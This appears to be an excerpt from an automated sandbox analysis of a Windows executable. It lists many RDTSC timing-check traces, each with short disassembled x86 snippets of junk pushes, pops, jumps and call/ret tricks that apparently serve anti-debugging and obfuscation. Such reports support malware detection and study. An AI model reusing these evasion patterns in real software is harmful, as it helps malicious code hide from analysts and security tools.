                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8511A second address: DD1D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edx, ebx 0x0000000c push dword ptr [ebp+122D142Dh] 0x00000012 pushad 0x00000013 cld 0x00000014 add dword ptr [ebp+12448A47h], eax 0x0000001a popad 0x0000001b call dword ptr [ebp+122D1BCDh] 0x00000021 pushad 0x00000022 jmp 00007FB958B07024h 0x00000027 xor eax, eax 0x00000029 pushad 0x0000002a jbe 00007FB958B0701Ch 0x00000030 mov bx, 2835h 0x00000034 popad 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 jmp 00007FB958B0701Fh 0x0000003e mov dword ptr [ebp+122D3A7Ch], eax 0x00000044 stc 0x00000045 mov esi, 0000003Ch 0x0000004a jc 00007FB958B0701Ch 0x00000050 add esi, dword ptr [esp+24h] 0x00000054 sub dword ptr [ebp+122D3374h], ecx 0x0000005a mov dword ptr [ebp+122D2BBDh], ebx 0x00000060 lodsw 0x00000062 jmp 00007FB958B0701Ch 0x00000067 add eax, dword ptr [esp+24h] 0x0000006b stc 0x0000006c mov ebx, dword ptr [esp+24h] 0x00000070 jmp 00007FB958B0701Ch 0x00000075 nop 0x00000076 push edi 0x00000077 pushad 0x00000078 jng 00007FB958B07016h 0x0000007e jmp 00007FB958B07028h 0x00000083 popad 0x00000084 pop edi 0x00000085 push eax 0x00000086 push edx 0x00000087 push eax 0x00000088 push edx 0x00000089 jmp 00007FB958B07020h 0x0000008e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F852E2 second address: F852FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB958FCD457h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F852FD second address: F85345 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B07021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FB958B07018h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 sub dword ptr [ebp+122D1B3Eh], edi 0x0000002e push eax 0x0000002f jns 00007FB958B07028h 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85345 second address: F85349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F855F6 second address: F85606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8599F second address: F859CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 jo 00007FB958FCD459h 0x0000000f call 00007FB958FCD452h 0x00000014 pop ecx 0x00000015 push 0000001Eh 0x00000017 sub dword ptr [ebp+122D2269h], ecx 0x0000001d nop 0x0000001e push edi 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85D18 second address: F85D69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B07027h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jne 00007FB958B07027h 0x00000010 nop 0x00000011 mov cx, di 0x00000014 lea eax, dword ptr [ebp+1248688Dh] 0x0000001a jmp 00007FB958B0701Ah 0x0000001f nop 0x00000020 pushad 0x00000021 jnc 00007FB958B0701Ch 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85D69 second address: F85DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB958FCD44Ch 0x0000000a popad 0x0000000b push eax 0x0000000c jbe 00007FB958FCD45Fh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FB958FCD448h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov edx, dword ptr [ebp+122D19FAh] 0x00000033 lea eax, dword ptr [ebp+12486849h] 0x00000039 jl 00007FB958FCD44Ch 0x0000003f mov edx, dword ptr [ebp+122D2226h] 0x00000045 nop 0x00000046 push eax 0x00000047 push edx 0x00000048 jne 00007FB958FCD44Ch 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85DE5 second address: F64AA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B07029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB958B07026h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FB958B07018h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a xor cx, BBBAh 0x0000002f call dword ptr [ebp+122D1AF0h] 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBDB14 second address: FBDB25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jne 00007FB958FCD44Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBDEFD second address: FBDF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007FB958B0701Eh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE051 second address: FBE057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE057 second address: FBE067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB958B07016h 0x0000000a popad 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE1CB second address: FBE1E2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB958FCD446h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jbe 00007FB958FCD44Eh 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE356 second address: FBE36B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB958B0701Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE36B second address: FBE36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE36F second address: FBE373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE373 second address: FBE3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB958FCD446h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push esi 0x00000010 jg 00007FB958FCD446h 0x00000016 jp 00007FB958FCD446h 0x0000001c pop esi 0x0000001d jmp 00007FB958FCD456h 0x00000022 push edx 0x00000023 jmp 00007FB958FCD459h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC661A second address: FC661E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC661E second address: FC6643 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD457h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FB958FCD44Ah 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC68CD second address: FC68D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC68D1 second address: FC68D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC68D5 second address: FC68DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC68DB second address: FC68EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB958FCD44Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC68EC second address: FC68F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC68F3 second address: FC691B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FB958FCD446h 0x00000011 jmp 00007FB958FCD457h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC691B second address: FC6928 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC6928 second address: FC6942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FB958FCD44Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edi 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC6942 second address: FC6968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB958B07029h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FB958B07016h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC6325 second address: FC632A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7044 second address: FC707C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB958B07023h 0x00000009 jmp 00007FB958B07026h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007FB958B07016h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC707C second address: FC7080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7080 second address: FC7084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7084 second address: FC7090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7090 second address: FC7096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7096 second address: FC70C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD44Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FB958FCD446h 0x00000011 jmp 00007FB958FCD457h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC721C second address: FC7222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7377 second address: FC7398 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jc 00007FB958FCD446h 0x0000000b jc 00007FB958FCD446h 0x00000011 popad 0x00000012 push edi 0x00000013 jne 00007FB958FCD446h 0x00000019 pop edi 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC76C9 second address: FC76CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3BAAB second address: F3BAC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 jng 00007FB958FCD446h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB958FCD44Ah 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD226D second address: FD2271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD2271 second address: FD229D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jnp 00007FB958FCD46Fh 0x0000000d jmp 00007FB958FCD457h 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FB958FCD446h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD242D second address: FD2431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD2549 second address: FD254D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD254D second address: FD2551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8585F second address: F8587B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB958FCD458h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD298C second address: FD29DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB958B07024h 0x0000000b pop esi 0x0000000c pushad 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007FB958B0701Fh 0x00000015 jmp 00007FB958B0701Ah 0x0000001a push eax 0x0000001b pop eax 0x0000001c popad 0x0000001d pushad 0x0000001e jmp 00007FB958B0701Fh 0x00000023 jnl 00007FB958B07016h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD29DF second address: FD29E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD357E second address: FD3587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD3587 second address: FD358D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6A69 second address: FD6A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6A6D second address: FD6A8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FB958FCD446h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FB958FCD452h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD62F0 second address: FD62FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD677E second address: FD6782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6782 second address: FD6786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6786 second address: FD67A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FB958FCD448h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FB958FCD451h 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDAF5C second address: FDAF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDAF62 second address: FDAF6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDAF6A second address: FDAF8D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB958B07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB958B07025h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB299 second address: FDB2AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD44Ah 0x00000007 jl 00007FB958FCD44Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB2AD second address: FDB2B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB2B7 second address: FDB2D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FB958FCD452h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB2D4 second address: FDB2D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDDA9F second address: FDDAA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE35B5 second address: FE35E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB958B07023h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007FB958B0701Ah 0x00000011 jns 00007FB958B0701Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE3728 second address: FE372C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE41B6 second address: FE41D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FB958B07020h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE41D0 second address: FE41D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE41D5 second address: FE41FD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB958B07018h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnc 00007FB958B0701Ch 0x00000011 jp 00007FB958B07016h 0x00000017 push edx 0x00000018 jmp 00007FB958B0701Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE41FD second address: FE421C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB958FCD456h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE44DE second address: FE44E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE44E3 second address: FE44FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FB958FCD446h 0x00000009 push eax 0x0000000a pop eax 0x0000000b jns 00007FB958FCD446h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4A91 second address: FE4A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5008 second address: FE501F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FB958FCD452h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE501F second address: FE5025 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5025 second address: FE502F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB958FCD446h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE502F second address: FE503B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5351 second address: FE5356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5356 second address: FE535C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED839 second address: FED83E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED992 second address: FED996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED996 second address: FED9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDB66 second address: FEDB6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDB6A second address: FEDB74 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB958FCD446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDCE7 second address: FEDCF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FB958B07016h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDE5D second address: FEDE6E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ecx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
